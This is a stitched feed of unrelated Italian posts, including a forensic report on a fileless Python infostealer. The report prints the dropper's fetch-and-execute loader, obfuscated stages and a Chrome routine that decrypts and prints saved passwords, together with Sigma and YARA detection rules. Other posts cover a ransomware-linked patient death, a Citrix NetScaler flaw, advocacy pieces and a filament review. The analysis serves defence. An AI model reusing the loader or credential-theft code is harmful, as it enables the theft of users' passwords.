Non è la prima volta che un attacco informatico si traduce in una perdita di vite umane.
Ne avevamo già parlato nell’articolo “I decessi avvenuti per il ransomware. I casi noti, le tendenze e il punto sull’Italia“, in cui analizzavamo il legame diretto tra incidenti cyber e morti documentate.

Purtroppo, questo fenomeno è sempre più frequente. Viviamo in un mondo interamente circondato da tecnologie digitali, e proprio per questo esposto al rischio di compromissione. Ma quando il bersaglio non è più un semplice dato, bensì un sistema critico come un pronto soccorso o un’infrastruttura sanitaria, le conseguenze non sono più virtuali: diventano tragicamente reali.

Secondo il National Health Service (NHS), l’anno scorso un attacco ransomware che ha interrotto gli esami del sangue in diversi ospedali di Londra ha contribuito alla morte di un paziente. L’attacco del gruppo di criminalità informatica Qilin contro il servizio di patologia Synnovis con sede a Londra, avvenuto lo scorso giugno, ha causato gravi interruzioni all’assistenza in numerosi ospedali del Servizio Sanitario Nazionale e presso fornitori di servizi sanitari di Londra.

A seguito dell’attacco, gli ospedali non sono stati in grado di eseguire gli esami del sangue alla normale velocità. Un portavoce del King’s College Hospital NHS Foundation Trust ha affermato che questo ritardo è stato tra “una serie di fattori contribuenti” che hanno portato alla morte di un paziente durante l’incidente, come riportato per primo dall’Health Service Journal.

“Purtroppo un paziente è morto improvvisamente durante l’attacco informatico. Come da prassi standard in questi casi, abbiamo effettuato un’analisi dettagliata delle sue cure”, ha dichiarato il portavoce. L’indagine sull’incidente relativo alla sicurezza del paziente ha individuato diversi fattori che hanno contribuito al decesso del paziente. Tra questi, la lunga attesa per l’esito di un esame del sangue a causa dell’attacco informatico che ha colpito i servizi di anatomia patologica in quel momento.

In una dichiarazione, il CEO di Synnovis, Mark Dollar, ha dichiarato: “Siamo profondamente addolorati nell’apprendere che l’attacco informatico criminale dell’anno scorso sia stato identificato come uno dei fattori che hanno contribuito alla morte di questo paziente. Siamo vicini alla famiglia coinvolta”.

Il mese scorso, Recorded Future News ha rivelato che due attacchi informatici che avrebbero interessato il Servizio Sanitario Nazionale (NHS) nel 2024 erano stati formalmente identificati come potenziali fattori di rischio per i pazienti. Si prevede che questi attacchi riguardino Synnovis e il Wirral University Teaching Hospital NHS Foundation Trust, causando ritardi nei trattamenti oncologici.

Si ritiene che i dati di oltre 900.000 individui siano stati compromessi dalle tattiche estorsive del gruppo ransomware, che prevedevano la pubblicazione dei risultati dei test che rivelavano i nomi dei pazienti con sintomi di infezioni sessualmente trasmissibili e cancro.

Un’analisi dei dati condotta dagli specialisti in violazioni dei dati CaseMatrix ha identificato nomi personali, date di nascita, numeri di telefono del Servizio Sanitario Nazionale e, in alcuni casi, dettagli di contatto personali, insieme ai moduli di patologia e istologia utilizzati per condividere i dati dei pazienti tra reparti medici e istituzioni. A un anno dalla violazione, i pazienti interessati non sono ancora stati informati su quali dati siano stati esposti nell’incidente.

L'articolo È morto per colpa di un ransomware! Un’altra vittima si aggiunge alla lista proviene da il blog della sicurezza informatica.

TLP: AMBER
Analista: Agostino Pellegrino, Crescenzo Cuoppolo, Alessio Bandini
Data ultima revisione: 2025-06-24

Questo report tecnico forense documenta l’analisi completa di un infostealer multi-stadio veicolato tramite un loader fileless in Python, identificato con la sigla “AP”. L’intera catena di infezione è eseguita in memoria e sfrutta servizi legittimi pubblici (Telegram, is.gd, paste.rs) per evitare la rilevazione e semplificare l’aggiornamento remoto del payload.

Il file iniziale, denominato Photos, contiene un dropper che esegue dinamicamente un secondo stadio offuscato, il quale a sua volta decodifica ed esegue in memoria un infostealer capace di esfiltrare informazioni sensibili da browser Chromium.

Catena di Infezione

Stadio 1 – Dropper Iniziale

Il file Photos contiene codice Base64 offuscato:

___________ = 'ADN_UZJomrp3vPMujoH4bot'; exec(__import__('base64').b64decode('...'))

Decodifica del codice:

import requests, re
exec(
requests.get(
requests.head(
f'https://is.gd/{match.group(1)}', allow_redirects=True
).url
).text
)

if (
match := re.search(
r'

Funzionamento:

• Recupera da un canale Telegram un codice og:description (es. fVmzS)
• Usa is.gd per risolvere il link accorciato
• Recupera un payload da paste.rs ed esegue dinamicamente

Stadio 2 – Loader Offuscato

Contenuto scaricato da paste.rs/fVmzS. Esegue la seguente catena:

exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b85decode("c$|c~*|PFlk|y|1XNVIgA|vOF$g0Ys7>c3D)_@p{S!e)(1e%eo3lNe(LIXmGNenkpZCz$

Dopo b85 → zlib → marshal, è necessario un ulteriore passaggio:

decoded = bytearray([b ^ 0x04 for b in payload_bytes])

Il risultato è un bytecode deoffuscato eseguibile direttamente in memoria:

import os, shutil, zipfile, sqlite3
from Cryptodome.Cipher import AES
import win32crypt
import json
import base64

# Estrazione dati da Chromium (semplificato)

def get_chrome_data():
local_state_path = os.path.expanduser('~') + r"\AppData\Local\Google\Chrome\User Data\Local State"
with open(local_state_path, "r", encoding="utf-8") as f:
local_state = json.loads(f.read())
key = base64.b64decode(local_state["os_crypt"]["encrypted_key"])[5:]
key = win32crypt.CryptUnprotectData(key, None, None, None, 0)
[1] login_data_path = os.path.expanduser('~') + r"\AppData\Local\Google\Chrome\User Data\Default\Login Data"
shutil.copy2(login_data_path, "Loginvault.db")
conn = sqlite3.connect("Loginvault.db")
cursor = conn.cursor()
cursor.execute("SELECT origin_url, username_value, password_value FROM logins")
for row in cursor.fetchall():
login_url = row
[0] username = row
[1] password = win32crypt.CryptUnprotectData(row[2])[1].decode()
print(f"URL: {login_url}\nUsername: {username}\nPassword: {password}\n")
cursor.close()
conn.close()
os.remove("Loginvault.db")
get_chrome_data()

Stadio 3 – Infostealer

Il codice risultante:

• Raccoglie credenziali, cookie, cronologia e carte da Chromium
• Cattura fingerprinting del sistema
• Comprimi dati in archivio .zip
• Prepara e invia l’esfiltrazione verso un server remoto (C2)

Indicatori di Compromissione

Tecniche MITRE ATT&CK

• T1059 – Command and Scripting Interpreter
• T1027 – Obfuscated Files or Information
• T1071.001 – Web Protocols
• T1082 – System Information Discovery
• T1567.002 – Exfiltration over Web Services
• T1218.010 – Proxy Execution (custom variant)

Rilevazione

Sigma Rule

title: Python Fileless Loader via Telegram and is.gd
logsource:
category: process_creation
product: windows
detection:
selection:
Image: '*\python.exe'
CommandLine|contains:
- requests.get(
- exec(
- t.me/
- is.gd/
condition: selection
level: high
description: Rileva dropper Python fileless con payload remote

YARA Rule

rule Fileless_Telegram_Loader {
meta:
description = "Rileva loader fileless basato su Telegram + is.gd"
author = "Agostino Pellegrino (apinfosec.com)"
version = "1.1"
date = "2025-06-24"
strings:
$a = "exec(requests.get(" ascii
$b = "https://t.me/" ascii
$c = "https://is.gd/" ascii
$d = "og:description" ascii
condition:
all of them and filesize

Raccomandazioni

• Isolare ambienti Python non gestiti
• Bloccare traffico a t.me, is.gd, paste.rs ove non necessario
• Attivare logging avanzato su processi RAM-residenti
• Applicare detection YARA e Sigma in EDR/SIEM
• Segnalare a CSIRT nazionale

Conclusioni

L’analisi tecnica condotta ha evidenziato l’elevato livello di sofisticazione dell’infostealer “AP”, capace di operare completamente in memoria, eludendo gran parte dei meccanismi di rilevamento tradizionali. La catena d’infezione multi-stadio utilizza un dropper fileless scritto in Python e sfrutta servizi pubblici legittimi — come Telegram, is.gd e paste.rs — per veicolare, aggiornare e rendere dinamico il payload finale.

Il secondo stadio, fortemente offuscato, culmina nell’esecuzione di un infostealer con capacità avanzate di esfiltrazione dati da browser Chromium-based, comprese credenziali salvate, cookie, cronologia e informazioni sensibili.

L’uso creativo e malevolo di meccanismi comuni (come i meta tag HTML, URL accorciati e servizi di messaggistica) rende questa minaccia particolarmente insidiosa, dimostrando una crescente tendenza all’abuso di infrastrutture legittime per finalità illecite.

Le tecniche MITRE ATT&CK individuate confermano il comportamento stealth e modulare del malware. L’adozione di meccanismi di rilevazione specifici, come regole Sigma e YARA personalizzate, è fondamentale per mitigare efficacemente questa minaccia. Inoltre, l’implementazione di policy restrittive e il monitoraggio continuo degli ambienti Python non gestiti rappresentano misure difensive prioritarie.

Questo caso studio rappresenta un chiaro esempio dell’evoluzione dei moderni infostealer verso architetture completamente fileless, con capacità di persistenza e aggiornamento che richiedono una risposta difensiva altrettanto dinamica e proattiva.

L'articolo Un nuovo infostealer fileless viene veicolato da Telegram e dai servizi legittimi proviene da il blog della sicurezza informatica.

Dal 2020 sono un utente #Fairphone, prima con il FP3+ e adesso con il FP5.

Sono un "Fairphone Angel" (è un nome che fa un po' ridere, lo so 😁 ) ovvero una di quelle persone che mettono la loro esperienza a disposizione di chi possiede un Fairphone o è interessato a saperne qualcosa di più (*). Maggiori informazioni le potete trovare qui.

Ho visto che nel Fediverso c'è un certo interesse su questi argomenti e così ho pensato di mettere un post "ad hoc" nel caso qualcuno volesse informazioni sul telefono.

Il sito ufficiale Fairphone è qui.

Bene, a voi la linea...

(*) Non abbiamo nessun rapporto organico con l'azienda né riceviamo compensi sotto nessuna forma, semplicemente crediamo in questo progetto, ci fa piacere contribuire in qualche modo e lo facciamo così.

QUI per firmare la proposta di legge online

Si è tenuta oggi, giovedì 26 giugno, in Piazza XXV Aprile a Milano, la conferenza stampa di lancio della raccolta firme per una proposta di legge di iniziativa popolare finalizzata a legalizzare tutte le scelte di fine vita, inclusa l’eutanasia, promossa dall’Associazione Luca Coscioni.

Nel corso dell’iniziativa – alla quale hanno preso parte Marco Cappato, tesoriere dell’Associazione Luca Coscioni e Matteo Mainardi, coordinatore delle campagne sul fine vita – insieme alla consigliera regionale della Lombardia (in quota Partito Democratico) Carmela Rozza, l’esponente del gruppo consiliare di Alleanza Verdi e Sinistra a Sesto San Giovanni Michele Foggetta, il consigliere comunale ed esponenti dei Sentinelli Milano, Alessandro Giungi – è stato attivato il primo tavolo di raccolta firme. Nei prossimi giorni, l’attività proseguirà in centinaia di piazze italiane.

L’obiettivo è di raccogliere le firme di almeno 50.000 persone in due settimane necessarie per poter depositare la proposta in Parlamento prima della ripresa della discussione sul fine vita prevista in Senato il 17 luglio.

La proposta di legge, depositata in Corte di Cassazione, su cui inizia la raccolta firme, prevede la possibilità per ogni persona maggiorenne, pienamente capace di prendere decisioni libere e consapevoli, affetta da una condizione o patologia irreversibile o da una patologia con una prognosi infausta a breve termine, fonte di sofferenze fisiche o psicologiche ritenute intollerabili, di richiedere, previa verifica delle condizioni, assistenza per porre fine volontariamente alla propria vita mediante autosomministrazione o somministrazione dei farmaci per il fine vita.

La legge prevede:

• la libertà di scelta tra autosomministrazione o somministrazione da parte di un medico;
• la presa in carico da parte del Servizio sanitario nazionale, con conclusione delle verifiche entro 30 giorni dalla richiesta;
• la possibilità per i medici di partecipare su base volontaria.

Il testo mira a superare le disuguaglianze territoriali e a garantire un diritto esigibile in tutto il Paese, nel rispetto dei principi costituzionali di autodeterminazione, dignità e umanità.

“Le persone con patologie irreversibili e sofferenze insopportabili hanno già diritto da sette anni a essere aiutate a morire senza soffrire in Italia grazie alla sentenza della Corte Costituzionale – dichiara Marco Cappato, Tesoriere Associazione Luca Coscioni -. Ora il Governo vuole restringere e cancellare questo diritto eliminando il ruolo del Servizio Sanitario Nazionale. Come Associazione Luca Coscioni invece proponiamo attraverso la legge di Iniziativa Popolare Eutanasia Legale di estendere il diritto ad essere aiutati anche da parte di un medico e anche per le persone che non siano dipendenti da trattamenti sanitari come i malattie terminali di cancro. Dopo aver raccolto 50.000 firme, a nome delle persone che avranno aderito presenteremo questa proposta entro metà luglio e il Parlamento dovrà discuterne quando avvierà il dibattito sul tema, dal 17 luglio in poi”.

Il testo integrale della proposta di legge, il materiale informativo e la mappa aggiornata dei tavoli per la raccolta firme sono disponibili QUI

L'articolo Al via la raccolta firme della proposta di iniziativa popolare per legalizzare tutte le scelte di Fine vita proviene da Associazione Luca Coscioni.

In occasione della Giornata mondiale sulle Droghe (26 giugno) e nell’ambito della campagna internazionale di mobilitazione Support! Don’t Punish è stato presentato alla Sala Stampa della Camera dei Deputati Il XVI Libro Bianco sulle droghe, quest’anno intitolato “NON MOLLARE”. Il Libro Bianco è un rapporto indipendente sugli effetti del Testo Unico sugli stupefacenti (DPR 309/90) sul sistema penale, sui servizi, sulla salute delle persone che usano sostanze e sulla società. È promosso da La Società della Ragione, Forum Droghe, Antigone, CGIL, CNCA, Associazione Luca Coscioni, ARCI, LILA con l’adesione di A Buon Diritto, Comunità di San Benedetto al Porto, Funzione Pubblica CGIL, Gruppo Abele, ITARDD, ITANPUD, Meglio Legale e EUMANS.

L’edizione del 2025 è dedicata a Grazia Zuffa, già docente, parlamentare e membra del Comitato nazionale di bioetica e fondatrice di Forum Droghe e la Società della Ragione morta improvvisamente questa primavera.

Il contributo dell’Associazione Luca Coscioni, di Marco Perduca e Peppe Brescia, riguarda le attività in corso affinché l’Italia apra alle terapie psichedeliche, un appello sottoscritto da oltre 15.000 persone che chiede al Governo di includere strutturalmente le molecole psichedeliche tra le cure palliative, sostenere l’accesso a terapie compassionevoli innovative, sempre con psichedelici, e suggerisce al Ministero della Difesa di prevedere progetti pilota di psicoterapie assistite da MDMA per lo stress post-traumatico sviluppato dal personale impiegato in zone di conflitto. L’Associazione è anche una delle organizzazioni che hanno lanciato l’iniziativa civica europea Psychedelicare.eu e produce il podcast Illuminismo Psichedelico curato da Federico Di Vita.

Dati e documenti sono sul sito dell’Associazione Luca Coscioni.

— Le droghe e la repressione: dati in pillole —

predisposti dal comitato di redazione diretto da Franco Corleone e coordinato da Leonardo Fiorentini

A 35 anni dall’entrata in vigore del Testo Unico sulle droghe 309/90 e 16 di pubblicazione del Libro Bianco sulle droghe, i dati purtroppo confermano una tendenza al peggioramento. Gli effetti penali, in particolare dell’art. 73, sono sempre più devastanti e creano sovraffollamento carcerario confermando che la Legge Jervolino-Vassalli resta il principale veicolo di ingresso nel circuito penale in Italia.

Continuano a salire in termini assoluti, +4,9%, gli ingressi in carcere per reati connessi alle droghe: 11.220 delle 43.489 detenzione nel 2024 sono state causate dall’art. 73 del Testo unico, per detenzione a fini di spaccio – il 25,8% degli ingressi (nel 2023 era il 26,3%).

Le presenze in carcere sono 62.715 a metà giugno. Di questi 13.354 a causa del solo art. 73 del Testo unico. Altre 6.732 in combinato con l’art. 74 (associazione finalizzata al traffico illecito di sostanze stupefacenti o psicotrope), solo 997 esclusivamente per l’art. 74. Complessivamente il 34,1% del totale. Sostanzialmente il doppio della media europea (18%) e molto di più di quella mondiale (22%).

Spropositati gli ingressi e le presenze di detenuti definiti “tossicodipendenti”: è dichiarato così il 38,8% di chi entra in carcere, mentre al 31/12/2024 erano presenti nelle carceri italiane 19.755 detenuti “certificati” il 31,9% del totale. Non erano mai stati così tanti dal 2006 (anno dell’entrata in vigore della legge Fini-Giovanardi) ad oggi.

Le conseguenze sulla Giustizia

Le associazioni della Società civile denunciano che continuano a esser negati i dati, pur pubblici, sui procedimenti in corso, per cui i dati sono fermi al 2023 che raccontano un paese in cui sono aperti quasi 120.000 fascicoli per procedimenti penali per droghe: per violazione dell’articolo 73 e 74 rispettivamente 170.292 e 45.285.

Le misure alternative

Continua l’allargamento della sfera penale che supera quota 150.000, con la costante crescita delle misure alternative, che sono in realtà una alternativa alla libertà invece che alla detenzione. In un contesto di forte domanda di controllo sociale istituzionale, gli strumenti di diversion e quelli di probation consentono di ampliare l’area del controllo, invece che limitare quello coattivo-penitenziario. Ne è segno il fatto che oltre ai quasi 62.000 detenuti al 31/12/2023 erano in carico per misure alternative e sanzioni di comunità (Messa alla Prova) ulteriori 93.475 soggetti, quasi 10.000 in più rispetto al 2023 (+11,6%).

Le segnalazioni e le sanzioni amministrative per il consumo di droghe illegali

Nel 2024 sono registrate 36.960 segnalazioni. Di queste circa il 38% finisce con una sanzione amministrativa (12.353), le più comuni la sospensione della patente (o il divieto di conseguirla) e del passaporto. Questo anche in assenza di un qualsiasi comportamento pericoloso messo in atto dalla persona sanzionata. La repressione continua ad abbattersi sui minori, che confermano i numeri del 2023, in attesa del loro consolidamento: 3.722 adolescenti che entrano in un percorso sanzionatorio stigmatizzante (cioè desocializzante) e controproducente. La quasi totalità dei minori, il 97,7%, è segnalato per cannabis. Risulta irrilevante la vocazione “terapeutica” della segnalazione al Prefetto: solo 410 persone sono state sollecitate a presentare un programma di trattamento socio-sanitario; nel 2007 erano 3.008. Anche gli inviti a presentarsi al SERD continuano a diminuire (3.792). La repressione colpisce principalmente persone che usano cannabis (77,4%), seguono a distanza cocaina (15,8%) ed eroina (2,8%) e, in maniera irrilevante, le altre sostanze. Dal 1990 1.463.442 persone sono state segnalate per possesso di droghe per uso personale, 1.074.754 di queste per derivati della cannabis.

Le associazioni che producono il Libro Bianco hanno convocato una contro-confereza sulle droghe il secondo finesettimana di novembre in concomitanza con la VII Conferenza sulle dipendenze indetta dal Governo.

L'articolo E’ stato presentato il XVI Libro Bianco sulle Droghe di cui l’Associazione Luca Coscioni è co-sponsor proviene da Associazione Luca Coscioni.

The Stronghero 3D hybrid PLA PETG filament, with visible PETG core. (Credit: My Tech Fun, YouTube)
Sometimes you see an FDM filament pop up that makes you do a triple-take because it doesn’t seem to make a lot of sense. This is the case with a hybrid PLA/PETG filament by Stronghero 3D that features a PETG core. This filament also intrigued [Dr. Igor Gaspar] who imported a spool from the US to have a poke at it to see why you’d want to combine these two filament materials.

According to the manufacturer, the PLA outside makes up 60% of the filament, with the rest being the PETG core. The PLA is supposed to shield the PETG from moisture, while adding more strength and weather resistance to the PLA after printing. Another interesting aspect is the multi-color look that this creates, and which [Igor]’s prints totally show. Finding the right temperatures for the bed and extruder was a challenge and took multiple tries with the Bambu Lab P1P including bed adhesion troubles.

As for the actual properties of this filament, the layer adhesion test showed it to be significantly worse than plain PLA or PETG when printed at extruder temperatures from 225 °C to 245 °C. When the shear stress is put on the material instead of the layer adhesion, the results are much better, while torque resistance is better than plain PETG. This is a pattern that repeats across impact and other tests, with PETG more brittle. Thermal deformation temperature is, unsurprisingly, between both materials, making this filament mostly a curiosity unless its properties work much better for your use case than a non-hybrid filament.

youtube.com/embed/PnMUxLlnPSA?…

hackaday.com/2025/06/26/pla-wi…

Citrix ha segnalato una nuova vulnerabilità critica nelle sue appliance NetScaler, già attivamente sfruttata dagli aggressori. Il problema è identificato con l’identificativo CVE-2025-6543 e riguarda le diffuse soluzioni NetScaler ADC e NetScaler Gateway utilizzate dalle aziende per l’accesso remoto e la protezione del perimetro di rete.

Come riportato nella nota ufficiale di Citrix, exploit per questa vulnerabilità sono già stati osservati in attacchi reali. CVE-2025-6543 (punteggio CVSS: 9,2) consente l’invio di una richiesta speciale da remoto e senza autenticazione, causando il malfunzionamento e l’indisponibilità del dispositivo. In particolare, si tratta di un completo disservizio che può paralizzare il funzionamento dell’infrastruttura aziendale.

La vulnerabilità interessa le versioni di NetScaler ADC e Gateway

• NetScaler ADC and NetScaler Gateway 14.1 BEFORE 14.1-47.46
• NetScaler ADC and NetScaler Gateway 13.1 BEFORE 13.1-59.19
• NetScaler ADC 13.1-FIPS and NDcPP BEFORE 13.1-37.236-FIPS and NDcPP

Sono interessati solo i dispositivi configurati come gateway, inclusi server VPN, proxy di applicazioni ICA, VPN clientless (CVPN), proxy desktop remoto e server di autenticazione virtuale (AAA).

Citrix ha già rilasciato patch per risolvere la vulnerabilità CVE-2025-6543 (monitorata internamente come CTX694788 ). Gli aggiornamenti sono disponibili per tutte le versioni interessate di NetScaler. L’azienda consiglia vivamente agli amministratori di installare questi aggiornamenti il ​​prima possibile e di rivedere le configurazioni dei dispositivi.

La comparsa di CVE-2025-6543 coincide con un altro problema nei prodotti Citrix, denominato ufficiosamente CitrixBleed 2 e identificato come CVE-2025-5777. Questa vulnerabilità consente agli aggressori di dirottare le sessioni utente attive estraendo token di autenticazione dalla memoria del dispositivo. Questa tecnica era già stata utilizzata dagli hacker criminali nel 2023, quando una vulnerabilità simile, chiamata CitrixBleed, fu sfruttata per attaccare il settore pubblico e grandi aziende, inclusi casi con successiva diffusione sulle reti interne.

Gli esperti sottolineano che entrambe le vulnerabilità sono critiche e richiedono un intervento immediato da parte dei reparti IT. Oltre a installare le patch, si consiglia di monitorare attivamente il comportamento dei dispositivi di rete, controllare le sessioni utente attive e rafforzare le policy di accesso.

Citrix non ha ancora fornito ulteriori chiarimenti sui dettagli dello sfruttamento di CVE-2025-6543.

L'articolo Citrix: nuova vulnerabilità critica da 9,2 colpisce NetScaler – attacchi in corso! proviene da il blog della sicurezza informatica.